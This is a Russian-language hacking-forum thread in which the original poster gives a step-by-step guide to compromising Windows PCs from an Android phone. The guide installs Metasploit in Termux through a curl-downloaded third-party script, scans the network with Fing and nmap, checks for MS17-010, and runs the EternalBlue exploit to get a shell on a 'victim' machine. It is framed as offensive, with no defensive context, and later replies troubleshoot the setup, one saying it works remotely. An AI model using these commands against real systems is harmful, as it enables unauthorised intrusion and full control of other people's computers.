1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Как похекать компухтер с андроида без root(eternalblue)

Тема в разделе "Наши статьи", создана пользователем D108, 11 фев 2018.

  1. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    Как я и обещал сегодня я расскажу как можно похекать комп в локальной сети(не только) БЕЗ ROOT
    Всё что нам для этого понадобится:
    • Прямые руки
    • Телефон на андроиде
    • Fing
    • nmap
    • temux и metasploit или kali nethunter
    1)
    Для начала скачаем Войти или зарегистрироваться, чтобы увидеть ссылку.
    Теперь установим metasploit:

    Код:
    apt update
    Код:
    apt upgrade
    Код:
    apt install curl
    Код:
    curl -LO https://raw.githubusercontent.com/1Tech-X/Metasploit-/master/metasploit.sh
    Код:
    cd metasploit-framework-4.14.28
    Код:
    ./msfconsole 
    Знаю загрузка довольно долгая но нужно потерпеть сожми яйца в кулак и жди

    После всего у нас должен открыться metasploit
    392559_Screenshot_20171121-132808.png
    После того как вы установили metasploit можете считать что вы Zупер хакер и спокойно идти грабить банк или на урок информатики к Марине Сергеевне.

    2)
    Сканирование сети c Fing
    Теперь посмотрим кто есть в нашей сети:
    Для этого удобно использовать утилиту Войти или зарегистрироваться, чтобы увидеть ссылку.(<=кликабельно)
    Вот так выглядит моя локальная сеть(у всех по разному):
    xWBQLtGcono.jpg
    И если у вас зрение не минус 40 то можно легко увидеть "USER-ПК"(у всех всё по разному) он и будет нашей жертвой.Выбираем и запоминаем ip нашей жертвы,в моём случае это 192.168.1.104 и сканим его на порты.

    3)
    Сканирование на открытые порты c nmap
    Установим этот чудесный инструмент:
    Код:
    apt-get update
    Код:
    apt-get install nmap
    ip нашей жертвы,в моём случае это 192.168.1.104, сканим его на порты
    Код:
    nmap ip жертвы
    В моём случае это:
    nmap 192.168.1.104
    Есть бесконечное множество настроек nmap но в данный момент подойдёт эта(из за скорости)
    Вот что мы видим:
    YcQE0WaayG8.jpg
    У меня стоит на машине 7 винда и у неё открыт 445 порт,любому более менее шарящему в metasploit человеку сразу понятно что первым делом мы будем юзать эксплоит eternalblue.

    4)
    Проверка уязвимости
    Дальше пойдут скрины с консоли kali nethunter так что не пугайтесь,все команды идентичны с командами в termux.(Мне так просто реально удобнее)
    Для начала мы протестим на сканере возьмёт ли наш эксплоит нашу жертву
    в metasploit вводите:
    Код:
    use auxiliary/scanner/smb/smb_ms17_010
    Здесь нам нужно указать только ip адрес жертвы
    Код:
    Выглядит это так:
    set RHOSTS ip жертвы
    В моём случае это:
    set RHOSTS 192.168.1.104
    Запускаем скан командой
    Код:
    run
    [​IMG]
    Если мы видим что-то подобное значит хост уязвим к эксплоиту

    5)
    Теперь завершающая стадия:использование эксплоита
    В том же metasploit пишем
    Код:
    use exploit/windows/smb/ms17_010_eternalblue
    Здесь нам нужно указать ip жертвы и процесс
    Ip жертвы:
    Код:
    Выглядит это так:
    set RHOST ip жертвы
    В моём случае это:
    set RHOST 192.168.1.104
    И процесс
    Код:
    set ProcessName explorer.exe
    [​IMG]
    И после того как вы помолились и поставили икону на обои можно запускать эксплоит
    Код:
    exploit
    Если всё удачно то тогда мы получим полный доступ к командной строке атакуемого компухтера.
    [​IMG]
    [​IMG]
    [​IMG]
    Всем спасибо за внимание!Удачно вам похекать компы!
    Если есть вопросы пишите сюда
    Ориджинал контент
     
    • Like Like x 6
  2. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    bash: cd: metasploit-framework-4.14.28: No such file or directory
     
  3. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    напиши
    Код:
    ls
    и посмотри на название файла
     
  4. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    записать как
    cd metasploit.sh
    ?
     
  5. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    :facepalm:
     
  6. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    lol
    У меня термукс на корейском
     
  7. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    сделай гайд для смартфонов XD:grinning:
     
  8. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    Может для дисковых телефонов?
     
  9. Stealth.X

    Stealth.X

    Регистрация:
    26 июл 2012
    Сообщения:
    315
    Симпатии:
    249
    ошибка у тебя в том что там отсутствует нужный файл
    вот и тс предлагает тебе вести команду ls и нажать энтер
    эта команда покажет тебе список файлов в данной директории
    таким образом ты увидишь если там нужный файл и какое у него названия
     
    • Like Like x 1
  10. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    Спасибо
     
  11. Serv3035

    Serv3035

    Регистрация:
    4 июл 2016
    Сообщения:
    78
    Симпатии:
    2
    хрен шас просканируешь порты на открытый 445 порт, не дают этот порт пинговать...
     
  12. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    Кто тебе в локалке не даёт 445 порт пинговать?
     
  13. Serv3035

    Serv3035

    Регистрация:
    4 июл 2016
    Сообщения:
    78
    Симпатии:
    2
    Извиняюсь, забыл добавить что сеть имел ввиду)
     
  14. vova19951995

    vova19951995

    Регистрация:
    13 фев 2018
    Сообщения:
    3
    Симпатии:
    0
    chmod 777 ./metasploit.sh после
    cd metasploit-framework-4.14.28
     
  15. 0ver1oad

    0ver1oad

    Регистрация:
    25 мар 2017
    Сообщения:
    85
    Симпатии:
    21
    • Agree Agree x 1
  16. Serhii

    Serhii

    Регистрация:
    30 май 2018
    Сообщения:
    2
    Симпатии:
    0
    Не получилось установить..
     
  17. Serhii

    Serhii

    Регистрация:
    30 май 2018
    Сообщения:
    2
    Симпатии:
    0
    Получилось . После танца с бубном..
     
  18. Messer2212

    Messer2212

    Регистрация:
    4 фев 2018
    Сообщения:
    12
    Симпатии:
    0
    а что не так было?
     
  19. usFire

    usFire

    Регистрация:
    20 авг 2012
    Сообщения:
    376
    Симпатии:
    179
    а чего локально , у меня удаленно работает .
     
  20. TopicStarter Overlay
    D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    319
    Симпатии:
    104
    Я на примере показывал
     

Поделиться этой страницей

Загрузка...